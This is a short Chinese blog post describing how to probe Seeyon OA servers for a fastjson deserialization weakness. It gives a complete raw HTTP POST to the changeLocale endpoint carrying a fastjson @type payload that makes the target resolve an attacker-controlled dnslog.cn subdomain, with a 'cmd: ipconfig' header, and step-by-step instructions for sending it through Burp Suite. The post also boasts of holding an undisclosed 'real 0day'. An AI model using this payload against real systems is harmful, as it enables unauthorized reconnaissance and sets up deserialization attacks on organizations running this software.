致远伪0day -fastjson第三方jar包利用链

致远伪0day -fastjson第三方jar包利用链

Scroll Down

1.打开http://www.dnslog.cn/ 点击Get SubDomain按钮后,下方会出现一个域名。

image.png

2.复制域名,在下方代码中替换。

POST /seeyon/main.do?method=changeLocale HTTP/1.1

Host: xxx.xxx.xxx.xxx

Content-Length: 210

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://xxx.xxx.xxx.xxx

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

cmd: ipconfig

Referer: https://xxx.xx.x.x/seeyon/main.do

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=26FF8158707BB0896A3ACD66EB92DD41; loginPageURL=

Connection: close

 

_json_params={"@type":"java.net.Inet4Address","val":"xv0hu4.dnslog.cn"}

3.将上面的代码放到BurpSuite中,然后设置好对应的HOST和端口。

image.png

4.发送数据包,然后在DNSLOG网站中点击Refresh按钮。是否有如下数据,则证明漏洞存在。
image.png

这种方式如果说服务器不出网,是测试不出来的。

并且,这个其实知识利用dnslog探测是否使用了fastjson。需要自己去找fastjson的利用链。

手上还有个真0day, :)